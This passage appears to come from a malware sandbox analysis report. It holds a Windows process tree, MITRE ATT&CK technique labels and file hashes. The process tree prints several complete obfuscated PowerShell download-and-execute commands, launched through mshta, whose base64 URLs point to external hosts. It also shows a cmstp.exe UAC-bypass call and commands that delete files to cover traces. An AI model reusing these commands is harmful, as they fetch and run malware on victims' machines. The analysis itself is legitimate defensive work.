      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2004
    - - C:\Users\Public\mrf.exe
        
        "C:\Users\Public\mrf.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2968
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\1287.tmp\m1a.hta"
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of WriteProcessMemory
    PID:1796
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL cfgtiyleoxj $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;cfgtiyleoxj rxjawksc $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rxjawksc;cfgtiyleoxj lkhxvdgpjitz $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL25pY29zbGFnLnJ1L2FzZGZnLmV4ZQ==';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);lkhxvdgpjitz $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:552
- - C:\Users\Admin\AppData\Local\Temp\1287.tmp\keygen.exe
    keygen.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1748
- - C:\Windows\SysWOW64\timeout.exe
    timeout 1
    3⤵
    - Delays execution with timeout.exe
    PID:1804
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\1287.tmp\b1.hta"
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of WriteProcessMemory
    PID:1824
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL cfpdmyg $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;cfpdmyg pnuqyjbf $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|pnuqyjbf;cfpdmyg josedgvxy $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL2JpdC5kby9lN1JqaQ==';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);josedgvxy $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
      4⤵
      Blocklisted process makes network request
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1312
    - - C:\Users\Public\mer.exe
        
        "C:\Users\Public\mer.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetWindowsHookEx
        
        PID:2772
      - C:\Users\Admin\AppData\Local\Temp\GBFtrybcvuyt.exe
        
        "C:\Users\Admin\AppData\Local\Temp\GBFtrybcvuyt.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetWindowsHookEx
        
        PID:2864
        
        C:\Users\Admin\AppData\Local\Temp\GBFtrybcvuyt.exe
        
        "C:\Users\Admin\AppData\Local\Temp\GBFtrybcvuyt.exe"
        7⤵
        Executes dropped EXE
        
        PID:3036
      - C:\Users\Admin\AppData\Local\Temp\FGrytnvbsdf.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FGrytnvbsdf.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetWindowsHookEx
        
        PID:2892
        
        C:\Users\Admin\AppData\Local\Temp\FGrytnvbsdf.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FGrytnvbsdf.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        
        PID:3068
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /pid 3068 & erase C:\Users\Admin\AppData\Local\Temp\FGrytnvbsdf.exe & RD /S /Q C:\\ProgramData\\724293906002427\\* & exit
        8⤵
        
        PID:916
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /pid 3068
        9⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2616
      - C:\Users\Public\mer.exe
        
        "C:\Users\Public\mer.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops desktop.ini file(s)
        Modifies system certificate store
        
        PID:2912
        
        C:\Users\Admin\AppData\Local\Temp\T0VMmp3AO2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\T0VMmp3AO2.exe"
        7⤵
        Executes dropped EXE
        
        PID:1928
        
        C:\Users\Admin\AppData\Local\Temp\kPnqVZ0Awg.exe
        
        "C:\Users\Admin\AppData\Local\Temp\kPnqVZ0Awg.exe"
        7⤵
        Executes dropped EXE
        Modifies system certificate store
        
        PID:3056
        
        C:\Windows\SysWOW64\Notepad.exe
        
        "C:\Windows\System32\Notepad.exe"
        8⤵
        
        PID:2844
        
        C:\Users\Admin\AppData\Local\Temp\8NjBb6n382.exe
        
        "C:\Users\Admin\AppData\Local\Temp\8NjBb6n382.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:2488
        
        C:\Users\Admin\AppData\Local\Temp\8NjBb6n382.exe
        
        "C:\Users\Admin\AppData\Local\Temp\8NjBb6n382.exe"
        8⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:2544
        
        \??\c:\windows\SysWOW64\cmstp.exe
        
        "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\45g43pdl.inf
        9⤵
        
        PID:2584
        
        C:\Users\Admin\AppData\Local\Temp\QsofULuZQO.exe
        
        "C:\Users\Admin\AppData\Local\Temp\QsofULuZQO.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:2520
        
        C:\Users\Admin\AppData\Local\Temp\QsofULuZQO.exe
        
        "C:\Users\Admin\AppData\Local\Temp\QsofULuZQO.exe"
        8⤵
        Executes dropped EXE
        Windows security modification
        
        PID:2612
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" Get-MpPreference -verbose
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2960
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\mer.exe"
        7⤵
        
        PID:2532
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /T 10 /NOBREAK
        8⤵
        Delays execution with timeout.exe
        
        PID:2632
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\1287.tmp\b1a.hta"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1996
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL pgnfirdewovxsl $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;pgnfirdewovxsl ezosprk $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|ezosprk;pgnfirdewovxsl ctslxmfoz $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL2tmZGhzYS5ydS9hc2RmZy5leGU=';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);ctslxmfoz $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:272
- - C:\Windows\SysWOW64\timeout.exe
    timeout 1
    3⤵
    - Delays execution with timeout.exe
    PID:1920
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\1287.tmp\b2.hta"
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of WriteProcessMemory
    PID:1580
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vqaznm $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vqaznm amvlntpxjbs $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|amvlntpxjbs;vqaznm gbxlmur $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL2JpdC5kby9lN1JqeA==';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);gbxlmur $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:600
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\1287.tmp\b2a.hta"
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of WriteProcessMemory
    PID:1804
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL xutrghv $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;xutrghv hjlgdycxt $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|hjlgdycxt;xutrghv gbljpredwuxzv $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL2JyYXRpb3AucnUvYXNkZmcuZXhl';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);gbljpredwuxzv $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1608

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x5ec
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2704

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2d4b56c1-d415-4ad2-880f-4b7960764845

MD5
354b8209f647a42e2ce36d8cf326cc92

SHA1
98c3117f797df69935f8b09fc9e95accfe3d8346

SHA256
feae405d288fdd38438f9d9b54f791f3ce3805f1bb88780da5aca402ad372239

SHA512
420be869b58e9a7a2c31f2550ac269df832935692a6431d455a10d9b426781e79d91e30ace2c465633b8a7ff2be1bf49734d8b99a390090dc4b36411d4391ff0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3bf4f350-86fe-486e-8b87-41ab96d0ad9c

MD5
b6d38f250ccc9003dd70efd3b778117f

SHA1
d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a

SHA256
4de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265

SHA512
67d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4408bb97-19ee-4815-b02c-5a0939dddad8

MD5
df44874327d79bd75e4264cb8dc01811

SHA1
1396b06debed65ea93c24998d244edebd3c0209d

SHA256
55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181

SHA512
95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_644b5728-e9b5-45ab-9104-7136ec814422

MD5
be4d72095faf84233ac17b94744f7084

SHA1
cc78ce5b9c57573bd214a8f423ee622b00ebb1ec

SHA256
b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc

SHA512
43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6532a425-51ae-4577-837f-c6e09d9fcfcf

MD5
75a8da7754349b38d64c87c938545b1b

SHA1
5c28c257d51f1c1587e29164cc03ea880c21b417

SHA256
bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96

SHA512
798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_69670b6c-d49a-42a9-993a-10d18807f7c6

MD5
5e3c7184a75d42dda1a83606a45001d8

SHA1
94ca15637721d88f30eb4b6220b805c5be0360ed

SHA256
8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59

SHA512
fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7f45a795-9723-4ae3-b7ea-79ea7f92b87a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7f45a795-9723-4ae3-b7ea-79ea7f92b87a

MD5
a725bb9fafcf91f3c6b7861a2bde6db2

SHA1
8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

SHA256
51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

SHA512
1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7f45a795-9723-4ae3-b7ea-79ea7f92b87a

MD5
a725bb9fafcf91f3c6b7861a2bde6db2

SHA1
8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

SHA256
51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

SHA512
1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7f45a795-9723-4ae3-b7ea-79ea7f92b87a

MD5
a725bb9fafcf91f3c6b7861a2bde6db2

SHA1
8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

SHA256
51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

SHA512
1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7f45a795-9723-4ae3-b7ea-79ea7f92b87a

MD5
a725bb9fafcf91f3c6b7861a2bde6db2

SHA1
8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

SHA256
51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

SHA512
1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7f45a795-9723-4ae3-b7ea-79ea7f92b87a

MD5
a725bb9fafcf91f3c6b7861a2bde6db2

SHA1
8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

SHA256
51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

SHA512
1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_aacd219d-c7ba-43ff-a67c-9ddc2f632d63

MD5
597009ea0430a463753e0f5b1d1a249e

SHA1
4e38b8bb65ecbd5c9f0d3d8c47f7caba33de6c62

SHA256
3fd2a8217a845c43dbc0dc206c28be81d2687aa9ba62019d905aef10cfaec45d

SHA512
5d722fa908e64575b2497c60d142e182011a10c6ed33813b3b4796b3147ece1bc96938518b4c8911a1bac3b7560528ebe3e8e754c11015516d335df5d7c6871d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ad37d8d7-bd23-479a-a3ed-1a61c0090f7c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_cc868c51-5adb-4e96-afa3-560303824dee

MD5
7f79b990cb5ed648f9e583fe35527aa7

SHA1
71b177b48c8bd745ef02c2affad79ca222da7c33

SHA256
080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683

SHA512
20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_cd64ffe4-ee16-47eb-bcbb-1f9d4279341a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e9f9468a-8cbd-4472-b808-e8b3772f4134

MD5
02ff38ac870de39782aeee04d7b48231

SHA1
0390d39fa216c9b0ecdb38238304e518fb2b5095

SHA256
fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876

SHA512
24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5
0795a1b2796a06500713984948e3816c

SHA1
d3b2659d90b64760bce87d6f3564ef9c41264b6f

SHA256
0846e29ea9bf91f3e2b0f443de1e6e86c1e81f7af0a5f6fece52913b5fe1671a

SHA512
4d96ce104207d34508dff1e137d0297146cfabc2989a68b5a77222602528d6a7319d4dffb1e133d26f6d286e3587c72ae6ed6530cb010944adff9001af0f99eb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5
11872e6844c72a42f2872ecffdb7b531

SHA1
401f7919664a3fca55e132a6c6c7ef3b5fcb4252

SHA256
9443c53d9e6bea93ef2c7b38c3dc2dd9805f583fc80be41c464dafcb95fb2d11

SHA512
39c07a4f6cd9b46c5accbe94f0b747eb454cd3c2e63bc64eaffe62454056b1737811cd55f38f5c5df25b198307b4533e61b55462e66d01fcedd7bf51adabe42c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5
11872e6844c72a42f2872ecffdb7b531

SHA1
401f7919664a3fca55e132a6c6c7ef3b5fcb4252

SHA256
9443c53d9e6bea93ef2c7b38c3dc2dd9805f583fc80be41c464dafcb95fb2d11

SHA512
39c07a4f6cd9b46c5accbe94f0b747eb454cd3c2e63bc64eaffe62454056b1737811cd55f38f5c5df25b198307b4533e61b55462e66d01fcedd7bf51adabe42c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5
11872e6844c72a42f2872ecffdb7b531

SHA1
401f7919664a3fca55e132a6c6c7ef3b5fcb4252

SHA256
9443c53d9e6bea93ef2c7b38c3dc2dd9805f583fc80be41c464dafcb95fb2d11

SHA512
39c07a4f6cd9b46c5accbe94f0b747eb454cd3c2e63bc64eaffe62454056b1737811cd55f38f5c5df25b198307b4533e61b55462e66d01fcedd7bf51adabe42c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5
0a09a79032b8057e7025c0094f5d2ce0

SHA1
d4b92f2a178dc421a08fb2b3d36a3774968fd697

SHA256
cd41501acd949eff08a4bcc2bc01f87af97d9883a73e8fcc23a101f1ceaed942

SHA512
90305534d77d6d69be2faf50d52bd0cf2b39285946e8595c0722e147b2a41bdea3afbb8a9bcd1cc871c8276dbc7f7ba79ff9c59af82effef6c1f53add109bde8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5
fc42cfe63ed694ac94d9b1e8bfdd8115

SHA1
1baafaff184dd1b49240343dcaf17ea987ff7226

SHA256
31136a60ad76ffcc8cd24078214dae5712b597ae5d6fcb3cd3c7601a3bcc9fe5

SHA512
1ad0d561d17e8a8774dc0ef3fb40c6d74024614dc48bba38e7d8dca492f58cc65d31423b9674135e6c313a3f9432afbba531e68dce1a09faa433e24aea40afab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5
f2f7edcb0a6142d0767d4f8a76b6051e

SHA1
c20ec074925aab3b5638fe1099cb7bdcf806bdf2

SHA256
d556a62db04bd6ce3d7adbda80d1066cc5ab31be2284a4144bb8ea8d7b489531

SHA512
7e9ddb7eaa9b067a28fe64e86fb6a5376ab69d74bd91487d3d8e7058dc70535e4cf526f19bc10b68bbffc1d6ebaa088c3224667fe5273cd1693fcf7d053574a3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5
18b6106170acd508232745515ad71af5

SHA1
15e1641e956edbad88a3524e60aba49e41827a00

SHA256
3a3f641ced12082501e8cbe94cf93c94443b5a90efc695aa996a9156a00ba3e6

SHA512
9dc0bc6a3685040b68c73da76fa5d31110b0b6a65ef55f53de4a560c199abf24d3d9981ce33850399d2399cb4cd6244847e815debbc061e130ede6fe7346cae4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5
360d4812fcde406a43b2887ab9892f8c

SHA1
